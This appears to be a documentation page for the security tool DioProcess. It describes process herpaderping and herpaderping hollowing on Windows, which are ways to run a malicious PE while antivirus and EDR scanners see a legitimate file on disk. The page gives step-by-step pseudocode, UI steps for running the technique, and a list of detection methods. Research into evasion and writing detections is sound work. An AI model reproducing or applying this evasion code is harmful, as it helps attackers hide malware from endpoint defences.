D
DioProcess

Herpaderping

Ring 3

Process creation techniques where the on-disk file is replaced with legitimate content after the image section is created.

Advanced Evasion Technique

These techniques exploit the timing gap between section creation and file scanning. Use only for authorized security research.

Process Herpaderping

The original herpaderping technique creates a process from a malicious PE, then overwrites the on-disk file with legitimate content before the process starts. When AV/EDR scans the file, they see the legitimate PE.

Herpaderping Algorithm

crates/misc/src/process/herpaderp.rs
pub fn herpaderp_process(
    payload_pe: &str,     // Malicious PE to execute
    payload_args: &str,   // Optional command line arguments
    legit_pe: &str,       // Legitimate PE to overwrite with
) -> Result<(u32, u32), MiscError> {
    
    // 1. Read both PEs into memory
    let payload_bytes = std::fs::read(payload_pe)?;
    let legit_bytes = std::fs::read(legit_pe)?;
    
    // Note: legit PE should be larger than payload PE
    
    // 2. Create temp file with full sharing
    let temp_path = format!("{}\HP_{}.tmp", temp_dir(), timestamp());
    let file_handle = CreateFileW(
        &temp_path,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
    )?;
    
    // 3. Write PAYLOAD PE to temp file
    WriteFile(file_handle, &payload_bytes)?;
    FlushFileBuffers(file_handle)?;
    SetEndOfFile(file_handle)?;
    
    // 4. Create SEC_IMAGE section from temp file (contains payload)
    let section_handle = NtCreateSection(
        SECTION_ALL_ACCESS,
        file_handle,
        SEC_IMAGE,
    )?;
    
    // 5. Create process from section
    let process_handle = NtCreateProcessEx(
        PROCESS_ALL_ACCESS,
        section_handle,
    )?;
    
    // === THE HERPADERP ===
    // 6. OVERWRITE temp file with LEGITIMATE PE
    //    AV/EDR will now see the legit PE when scanning!
    SetFilePointerEx(file_handle, 0, FILE_BEGIN)?;
    WriteFile(file_handle, &legit_bytes)?;
    FlushFileBuffers(file_handle)?;
    SetEndOfFile(file_handle)?;  // Truncate/extend to legit size
    
    // 7. Close file handle (scanning happens here)
    CloseHandle(file_handle);
    
    // 8. Set up process parameters (PEB, environment, command line)
    setup_process_parameters(process_handle, &temp_path, payload_args)?;
    
    // 9. Create initial thread at payload entry point
    let thread_handle = NtCreateThreadEx(
        process_handle,
        payload_entry_point,
    )?;
    
    Ok((pid, tid))
}

Herpaderping Hollowing

Combines herpaderping with hollowing: the "herpaderped" section is mapped into a legitimate suspended process instead of creating a new process from the section.

Herpaderping Hollowing Algorithm

crates/misc/src/process/herpaderp_hollow.rs
pub fn herpaderp_hollow_process(
    payload_pe: &str,   // Malicious PE payload
    legit_pe: &str,     // Serves as BOTH host process AND disk overwrite
) -> Result<(u32, u32), MiscError> {
    
    // 1. Read payload PE
    let payload_bytes = std::fs::read(payload_pe)?;
    
    // 2. Create temp file, write payload, create section (same as herpaderping)
    let temp_path = format!("{}\HPH_{}.tmp", temp_dir(), timestamp());
    // ... write payload_bytes, create SEC_IMAGE section ...
    
    // 3. Create LEGITIMATE process SUSPENDED (using legit_pe as host)
    let (process_handle, thread_handle, pid, tid) = CreateProcessW(
        legit_pe,
        CREATE_SUSPENDED,
    )?;
    
    // 4. Map the herpaderped section into suspended process
    let mapped_base = NtMapViewOfSection(
        section_handle,
        process_handle,
    )?;
    
    // === THE HERPADERP ===
    // 5. OVERWRITE temp file with legit PE content
    let legit_bytes = std::fs::read(legit_pe)?;
    SetFilePointerEx(file_handle, 0, FILE_BEGIN)?;
    WriteFile(file_handle, &legit_bytes)?;
    // ... close file handle ...
    
    // 6. Hijack thread: point RCX to mapped payload entry
    let context = GetThreadContext(thread_handle)?;
    context.Rcx = mapped_base + payload_entry_rva;
    SetThreadContext(thread_handle, &context)?;
    
    // 7. Patch PEB.ImageBase
    NtWriteVirtualMemory(
        process_handle,
        peb_image_base_addr,
        &mapped_base,
    )?;
    
    // 8. Resume thread - payload executes inside legit process!
    ResumeThread(thread_handle)?;
    
    Ok((pid, tid))
}

Comparison

AspectHerpaderpingHerpaderping Hollowing
Process NameTemp file nameLegitimate process
File on DiskYes (shows legit PE)Yes (shows legit PE)
Host ProcessNew processExisting legit process
Command Line ArgsSupportedInherited from host
Stealth LevelHighVery High

Why It Works

Timing Exploitation

The image section is created from the payload PE, then the file content changes. The running process uses the original (payload) section data, but disk scanners see the new (legitimate) content.

Section Caching

Windows caches the image section at creation time. Changes to the underlying file don't affect the already-created section — it's a copy-on-write snapshot.

Requirements

  • 64-bit payload — Only x64 PE files supported
  • Legit PE larger than payload — The overwriting PE should be at least as large
  • Admin privileges — Required for NT API process creation

UI Access

Access via Utilities tab → Herpaderping section:

  • Technique selector — Choose "Herpaderping" or "Herpaderping Hollowing"
  • PE Payload picker — Select 64-bit payload to execute
  • Command arguments — Optional args for herpaderping (not hollowing)
  • Legitimate Image picker — Select PE for disk overwrite (and host in hollowing mode)
  • Execute button — Performs the selected technique

Detection

These techniques can be detected by:

  • • Monitoring file writes after NtCreateSection
  • • Comparing image section hash to file hash at process start
  • • ETW tracing section creation followed by file modification
  • • Memory forensics comparing mapped image to disk file
  • • Detecting NtMapViewOfSection of foreign sections into processes

Related Techniques